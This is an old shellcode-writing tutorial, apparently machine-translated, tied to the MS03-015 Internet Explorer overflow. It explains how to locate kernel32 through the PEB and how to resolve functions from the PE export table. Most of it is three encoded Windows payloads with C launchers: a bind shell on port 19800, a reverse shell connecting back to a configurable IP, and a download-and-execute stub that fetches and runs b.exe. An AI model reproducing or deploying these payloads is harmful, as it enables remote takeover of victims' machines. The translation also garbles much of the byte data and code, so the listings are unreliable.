Shellcode writing technology
Create time: 2003-08-31
Article attribute: original
Article submission:
JENO (xxgchappy_at_vip.sina.com)
Author: jeno
Email: jeno@vip.371.net
Time: 2003-8-31
Title: shellcode writing technology
Previous days in debugging
http://www.microsoft.com/technet/security/bulletin/ms03-015.asp
I met more distressed things, that is, I get the right to execute code by covering EIP or SEH, but
Nowadays, online popular shellcode can't meet my requirements, mainly have the following aspects:
1, not universal, usually only run under Win2000, rarely running normally under WinXP, Win2003.
2. There is no handling program to exit the problem, and the IE is overflow at the same time when IE overflows.
3, some code is too long, even above 1000 bytes.
4, may not be universal in different locations.
Because of the above four reasons, I intend to write a universal shellcode. In fact, shellcode is not universal.
Get some way of address, I have seen many people written shellcode always don't be too good, because they are mostly looking in PEB.
Out of the address of the Kernel32, then there is an ASCII code you need a function at the end of Shellcode, find the address by searching memory,
Let me talk about why I can find the address of the Kernel32 in PEB:
1, FS point to the TEB structure
2, point to PEB structure in TEB 0x30
3, point to PEB_LDR_DATA structure in PEB 0x0C
4, in the PEB_LDR_DATA 0x1c place is the address of some dynamic connection libraries, such as the first point to NTDLL.DLL
Is the address of the kernel32.dll we need
The following is a compilation code
Mov Eax, FS: 0x30
Mov Eax, [EAX 0x0c]
Mov ESI, [EAX 0x1c]
Lodsd
MOV EBP, [EAX 0x08] // EBP is the address of kernel32.dll
General shellcode obtains a function of the function as compilation as follows:
Search_function:
Inc EBX
CMP [EBX], DL
JNE NO_ZERO
Inc ECX
NO_ZERO:
CMP [EBX], DWORD PTR 'PTEG'
JNE NO_MATCH
CMP [EBX 4], DWORD PTR 'Acor'
JNE NO_MATCH
JE Search_complete
NO_MATCH:
JMP Search_Function
EBX is placed in ESI: 0 things is generally a base address.
Such as DB 0FFH, 0FFH, 0E8H, 077H; Specify The Kernel Base @ 77e60000H
This is the main reason for the general shellcode universal (fixed address)
In order to achieve a general purpose, we must analyze the PE file format, and by analyzing us:
Get function addresses from PE EDT
1, pe header offset = kernel32.dll base address 0x3c;
2, Exports Directory Offset = Kernel32.dll Base Address PE Header Offset 120;
3, Exports Directory Table = Kernel32.dll Base Address Exports Directory Offset; 4, Name Pointers Table = Exports Directory Table 32;
5, then then the name of the comparison function in Name Pointers Table (can be compared according to the name, you can also compare the name hash below)
6, Ordinals Table = Exports Directory Table 36
7. ORDINALS TABLE points to the address of the function, so finding the address of the function with the corresponding serial number through the Ordinals Table
Give the search assembly code
MOV EBP, [Somewhere] kernel32.dll base address
MOV EAX, [EBP 0x3c] EAX = peeader offset
Mov EDX, [EBP EAX 120]
Add Edx, EBP EDX = Exports Directory Table
MOV ECX, [EDX 24] ECX = Number of Name Pointers
MOV EBX, [EDX 32]
Add Ebx, EBP EBX = Name Pointers Table
Dec ECX
MOV ESI, [EBX ECX * 4]
Add ESI, EBP ESI is pointing to Name Pointer
The following search can write it yourself, and the sky is high!
Experience:
1, then write the network shellcode, it is best to add WairForsingleObject.
2, don't forget EXITPROCESS, you can avoid many program errors.
3, the code will not have 0a after XOR99, because the 0A converts 0D to 0D0A during the IE overflow to be shortened during the COPY string.
Well write this well! I hope that everyone will be inspired!
Three universal shellcode that comes with me:
1, Bindport 19800
#include
#include
#pragma comment (Lib, "WS2_32.LIB")
#define scport 19800
// don't change the offset
#define port_offset 251
Unsigned char jeno_bindport19800_sc [] =
"/ XEB / X10 / X5B / X4B / X33 / XC9 / X66 / XB9 / XD9 / X01 / X80 / X34 / X0B / X99 / XE2 / XFA"
"/ XeB / X05 / XE8 / XEB / XFF / XFF / XFF / X18 / X75 / X19 / X99 / X99 / X99 / X12 / X6D / X71"
"/ XD5 / X98 / X99 / X99 / X10 / X9F / X66 / XAF / XF1 / X17 / XD7 / X97 / X75 / X71 / XFF / X98"
"/ x99 / x99 / x10 / xdf / x91 / x66 / xaf / xf1 / x34 / x40 / x9c / x57 / x71 / xce / x98 / x99"
"/ x99 / x10 / xdf / x95 / xf1 / xf5 / xf5 / x99 / x99 / xf1 / xaa / xab / xb7 / xfd / xf1 / XEE"
"/ XEA / XAb / XC6 / XCD / X66 / XCF / X91 / X10 / XDF / X9D / X66 / XAF / XF1 / XEB / X67 / X2A"
"/ x8f / x71 / x99 / x10 / xdf / x89 / x66 / xaf / xf1 / xe7 / x41 / x7b / xea"
"/ X71 / XBA / X98 / X99 / X99 / X10 / XDF / X8D / X66 / XEF / X9D / XF1 / X52 / X74 / X65 / XA2"
"/ x71 / x8a / x98 / x99 / x99 / x10 / xdf / x81 / x66 / Xef / x9d / xf1 / x40 / x90 / x6c / x34"
"/ x71 / x9 / x98 / x99 / x99 / x10 / xdf / x85 / x66 / XEF / X9D / XF1 / X3D / X83 / XE9 / X5E"
"/ x71 / x99 / x10 / xdf / xb9 / x66 / xef / x9d / xf1 / x3d / x34 / xb7 / x70"
"/ X71 / X7A / X99 / X99 / X99 / X10 / XDF / XBD / X66 / XEF / X9D / XF1 / X7C / XD0 / X1F / XD0"
"/ x71 / x4a / x99 / x99 / x99 / x10 / xdf / xb1 / x66 / xef / x9d / xf1 / x7e / xe0 / x5f / xe0"
"/ x71 / x5a / x99 / x99 / x99 / x10 / xdf / xb5 / xaa / x09 / x18 / x75 / x09 / x98 / x99 / x99"
"/ XCD / XF1 / X98 / X98 / X99 / X99 / X66 / XCF / X81 / XC9 / XC9 / XC9 / XC9 / XD9 / XC9 / XD9"
"/ XC9 / X66 / XCF / XCE / XCE / XD4 / XC1 / X12 / X55 / XF3"
"/ X8F / XC8 / XCA / X66 / XCF / XB9 / XCE / XCA / X66 / XCF / XBD / XCE / XC8 / XCA / X66 / XCF"
"/ XB1 / X12 / X49 / XF1 / XFC / XE1 / XFC / X99 / XF1 / XFA / XF4 / XFD / XB7 / X10 / XFF / XA9"
"/ x1a / x75 / xcd / x1a / xa5 / xbd / xaa / x59 / xaa / x50 / x1a / x58 / x8c / x32 / x7b / x64"
"/ X5F / XDD / XBD / X89 / XDD / X67 / XDD / XBD / XA5 / X67 / XDD / XBD / XA4 / X10 / XCD / XBD"
"/ XD1 / X10 / XCD / XBD / XD5 / X10 / XCD / XBD / XC9 / X14 / XDD / XBD / X89 / XCD / XC9 / XC8"
"/ XC8 / XD0 / XC8 / XC8 / X66 / XEF / XA9 / XC8 / X66 / XCF / X89 / X12 / X55"
"/ XF3 / X66 / XCF / X95 / X12 / X51 / XCE / X66 / XCF / XB5 / X66 / XCF / X8D"
"/ XCC / XCF / XFD / X38 / XA9 / X99 / X99 / X99 / X1C / X59 / XE1 / X95 / X12 / XD9 / X95 / X12"
"/ XE9 / X85 / X34 / X12 / X90 / X12 / XD9 / XAD / X12 / X31 / X21 / X99 / X99"
"/ X99 / X12 / X5C / XC7 / XC4 / X5B / X9D / X99 / XCA / XCC / XCF / XCE / X12 / XF5 / XBD / X81"
"/ X12 / XDC / XA5 / X12 / XCD / X9C / XE1 / X9A / X4C / X12 / XD3 / X81 / X12 / XC3 / XB9 / X9A"
"/ x44 / x7a / xab / xd0 / x12 / xad / x12 / x9a / x6c / xaa / x66 / x65 / xaa / x59 / x35 / xa3"
"/ X5D / XED / X9E / X58 / X56 / X72 / X6B / XA2 / XE5 / XBD / X8D / XEC / X78"
"/ X12 / XC3 / XBD / X9A / X44 / XFF / X12 / X95 / XD2 / X12 / XC3 / X85 / X9A / X44 / X12 / X9D" "/ X12 / X9A / X5C / X72 / X9B / XAA / X59 / X12 / X4C / XC6 / XC7 / XC4 / XC2 / X5B / X9D / X99 "
// bindport 19800
INT main (int Argc, char ** argv)
{
WSADATA WSA;
UNSIGNED SHORT Port;
WSASTARTUP (Makeword (2, 2), & WSA);
Port = HTONS (SCPORT) ^ (u_short) 0x9999;
Memcpy (& JENO_BINDPORT19800_sc [Port_offset], & Port, 2);
((Void (*) (void)) & jeno_bindport19800_sc) ();
}
2, Reverse Shellcode Default Connect Back 127.0.0.1 1980
#include
#include
#pragma comment (Lib, "WS2_32.LIB")
#define SCIP "127.0.0.1"
#define SCPORT 1980
// don't change the offset
#define ip_offset 201
#define port_offset 208
Unsigned char jeno_connectback_sc [] =
"/ XEB / X10 / X5B / X4B / X33 / XC9 / X66 / XB9 / X9F / X01 / X80 / X34 / X0B / X99 / XE2 / XFA"
"/ XEB / X05 / XE8 / XEB / XFF / XFF / XFF / XFF / X18 / X75 / X19 / X99 / X12 / X6D / X71 / X8A"
"/ x98 / x99 / x99 / x10 / x9f / x66 / xaf / xf1 / x17 / xd7 / x97 / x75 / x71 / xb4 / x98 / x99"
"/ x99 / x10 / xdf / x91 / x66 / xaf / xf1 / x34 / x40 / x9c / x57 / x71 / x87 / x98 / x99 / x99"
"/ x10 / xdf / x95 / xf1 / xf5 / xf5 / x99 / x99 / xf1 / xaa / xab / xb7 / xfd / xf1 / XEE / XEA"
"/ XAb / XC6 / XCD / X66 / XCF / X91 / X10 / XDF / X9D / X66 / XAF / XF1 / XEB / X67 / X2A / X8F"
"/ x71 / x99 / x10 / xdf / x89 / x66 / xaf / xf1 / xe7 / x41 / x7b / xea / x71"
"/ x73 / x99 / x99 / x99 / x10 / xdf / x8d / x66 / XEF / X9D / XF1 / X52 / X74 / X65 / XA2 / X71"
"/ x43 / x99 / x99 / x99 / x10 / xdf / x81 / x66 / XEF / X9D / XF1 / X40 / X90 / X6C / X34 / X71"
"/ x53 / x99 / x99 / x99 / x10 / xdf / x85 / x66 / Xef / x9d / xf1 / x75 / x60 / x33 / xf9 / x71"
"/ x23 / x99 / x99 / x99 / x10 / xdf / x09 / x98 / x99 / x99 / xcd / xf1 / x98"
"/ x98 / x99 / x99 / x66 / xcf / x81 / xc9 / xc9 / xc9 / xc9 / xd9 / xc9 / xd9 / xc9 / x66 / xcf"
"/ x85 / x12 / x66 / xcf / x8d / xf1 / x98 / x99 / x99 / x98" "/ x9e / x25 / x12 / x55 / xf3 / x89 / xc8 / XCA / X66 / XCF / XB9 / X1C / X59 / XEC / X7F / XF1 "
"/ XFC / XE1 / XFC / X99 / XF1 / XFA / XF4 / XFD / XB7 / X10 / XFF / XA9 / X1A / X5D / X35 / X14"
"/ XA5 / XBD / XAA / X59 / XAA / X50 / X19 / X70 / X72 / X32 / X7B / X64 / X5F / XDD / XBD / X89"
"/ XDD / X67 / XDD / XBD / XA5 / X67 / XDD / XBD / XA4 / X10 / XC5 / XBD / XD1 / X10 / XC5 / XBD"
"/ XD5 / X10 / XC5 / XBD / XC9 / X14 / XDD / XBD / X89 / XCD / XC9 / XC8 / XC8 / XC8 / XF3 / X98"
"/ XC8 / XC8 / X66 / XEF / XA9 / XC8 / X66 / XCF / X89 / X12 / X55 / XF3 / X66 / X66 / XA8 / X66"
"/ XCF / X95 / X16 / XCC / XCF / XFD / X38 / XA9 / X99 / X99 / X99 / X1C / X59"
"/ XE1 / X95 / X12 / XD9 / X95 / X12 / XE9 / X85 / X34 / X12 / XF1 / X91 / X72 / X90 / X12 / XD9"
"/ XAD / X12 / X31 / X21 / X99 / X99 / X99 / X12 / X5C / XC7 / XC4 / X5B / X9D / X99 / XCA / XCC"
"/ XCF / XCE / X12 / XF5 / XBD / X81 / X12 / XDC / XA5 / X12 / XCD / X9C / XE1 / X9A / X4C / X12"
"/ xd3 / x81 / x12 / xc3 / xb9 / x9a / x44 / x7a / xab / xd0 / x12 / xad / x12 / x9a / x6c / xaa"
"/ x66 / x65 / xaa / x59 / x35 / xa3 / x5d / xed / x9e / x58 / x56 / x94 / x9a / x61 / x72 / x6b"
"/ XA2 / XE5 / XBD / X8D / XEC / X78 / X12 / XC3 / XBD / X9A / X44 / XFF / X12 / X95 / XD2 / X12"
"/ xc3 / x85 / x9a / x44 / x12 / x9d / x12 / x9a / x5c / x72 / x9b / xaa / x59 / x12 / x4c / xc6"
"/ xc7 / xc4 / xc2 / x5b / x9d / x99";
Main ()
{
WSADATA WSA;
UNSIGNED SHORT Port;
UNSIGNED long IP;
WSASTARTUP (Makeword (2, 2), & WSA);
Port = HTONS (SCPORT) ^ (u_short) 0x9999;
IP = INET_ADDR (SCIP) ^ 0x99999999;
Memcpy (& Jeno_ConnectBack_sc [Port_offset], & Port, 2);
Memcpy (& jeno_connectback_sc [ip_offset], & ip, 4);
((void (*) (void)) & jeno_connectback_sc) ();
Return 0;
}
3, Download && Executeshellcode
#include
#include
Unsigned char jeno_downloadfile_sc [] =
"/ x33 / xc9 / x66 / xb9 / x3c / x01 / x80 / x34 / x0b / x99 / x05 / xfa" "/ XEB / X05 / XE8 / XEB / XFF / XFF / XFF / X70 / X34 / X99 / X99 / X99 / XC3 / X12 / X6B / XAA "
"/ x59 / x35 / xa4 / x01 / x99 / x99 / x99 / XEC / X6F / X18 / X75 / X99 / X12"
"/ X6D / X10 / XCF / XBD / X71 / X99 / XAA / X42 / X10 / X9F / X66 / XAF / XF1"
"/ x17 / x71 / x34 / x99 / x99 / x99 / x10 / xdf / x91 / xf1 / xf5 / xf5 / x99"
"/ X99 / XF1 / XF6 / XF7 / XB7 / XFD / XF1 / XEC / XEB / XF5 / XF4 / XCD / X66 / XCF / X91 / X10"
"/ XDF / X9D / X66 / XAF / XF1 / XE7 / X41 / X7B / XEA / X71 / X11 / X99 / X99 / X99 / X10 / XDF"
"/ X95 / X01 / X67 / X13 / X97 / X71 / XE0 / X99 / X99 / X99 / X10 / XDF / X8D"
"/ x66 / xaf / xf1 / xbc / x29 / x66 / x5b / x71 / xf3 / x99 / x99 / x99 / x10 / xdf / x81 / x66"
"/ XEF / X9D / XF1 / XAF / X83 / XB6 / XE9 / X71 / XC3 / X99 / X99 / X99 / X10 / XDF / X89 / XF3"
"/ XFC / XF1 / XEA / XB7 / XFC / XE1 / X10 / XFF / X85 / X66 / XEF / X85 / X66 / XCF / X81 / XAA"
"/ X50 / XC8 / XC8 / X66 / XEF / X85 / X66 / XEF / XBD / XC8 / X66 / XCF / X89 / XAA / X50 / XC8"
"/ X66 / XEF / X85 / X66 / XCF / X8D / X66 / XCF / X95 / X70 / X19 / X99 / X99 / X99 / XCC / XCF"
"/ XFD / X38 / XA9 / X99 / X99 / X99 / X1C / X59 / XE1 / X95 / X12 / XD9 / X95 / X12 / XE9 / X85"
"/ x34 / x12 / x90 / x12 / xd9 / xad / x12 / x31 / x21 / x99 / x99 / x99 / x12"
"/ X5C / XC7 / XC4 / X5B / X9D / X99 / XCA / XCC / XCF / XCE / X12 / XF5 / XBD / X81 / X12 / XDC"
"/ Xa5 / X12 / XCD / X9C / XE1 / X9A / X4C / X12 / XD3 / X81 / X12 / XC3 / XB9 / X9A / X44 / X7A"
"/ XAB / XD0 / X12 / XAD / X12 / X9A / X6C / XAA / X66 / X65 / XAA / X59 / X35 / XA3 / X5D / XED"
"/ x9e / x58 / x61 / x72 / x6b / xa2 / xe5 / xbd / x8d / xec / x78 / x12 / xc3"
"/ xbd / x9a / x44 / xd2 / x12 / xc3 / x85 / x9a / x44 / x12 / x9d / x12 / x9a"
"/ X5C / X72 / X9B / XAA / X59 / X12 / X4C / XC6 / XC7 / XC4 / XC2 / X5B / X9D / X99 / X71 / X50"
"/ x67 / x66 / x66"
"
http://127.0.0.1/b.exe "
"/ x98";
Main ()
{
((void (*) (void)) & jeno_downloadfile_sc) ();
Return 0;
}
End.
